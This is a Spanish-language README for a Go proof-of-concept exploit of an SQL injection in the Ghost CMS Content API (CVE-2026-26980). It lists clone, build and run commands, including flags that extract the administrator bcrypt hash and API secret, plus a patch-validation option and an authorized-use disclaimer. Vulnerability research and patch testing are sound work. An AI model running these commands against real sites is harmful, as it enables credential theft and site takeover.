
PoC basado en Go para la inyección SQL de la API de contenido de Ghost CMS (CVE-2026-26980). Verifica la vulnerabilidad, extrae credenciales de administrador y secretos de API, y valida parches en las versiones afectadas 3.24.0–6.19.0.
Este repositorio contiene una herramienta de prueba de concepto basada en Go para demostrar y validar la vulnerabilidad de inyección SQL en la API de Contenido de Ghost CMS descrita por CVE-2026-26980. La implementación se basa en el flujo de explotación implementado en el archivo fuente principal de Go y está destinada únicamente a investigación de seguridad autorizada y pruebas.
El PoC apunta a instancias de Ghost CMS afectadas por una vulnerabilidad de ordenamiento del filtro de slug en la API de Contenido. Puede:
La implementación está referenciada específicamente al siguiente contexto de aviso:
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
Desde la raíz del proyecto, compile el binario con:
go build -o ghost-sqli ghost_sqli_cms.go
OR
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
--url <URL>: URL base de Ghost CMS objetivo (requerido)--validate-fix: probar si el objetivo ya no es vulnerable--extract-password: también extraer el hash bcrypt del administrador--extract-api-key: también extraer el secreto de API del administrador--content-key <KEY>: omitir la configuración y usar una clave de API de Contenido proporcionada-v, --verbose: habilitar salida de depuración-h, --help: mostrar información de ayudaEste proyecto se proporciona únicamente con fines educativos y de evaluación de seguridad autorizada. Úselo solo contra sistemas que posea, que esté autorizado a probar o que evalúe en un entorno controlado. El acceso no autorizado o la explotación de sistemas de terceros es ilegal y puede violar las leyes aplicables.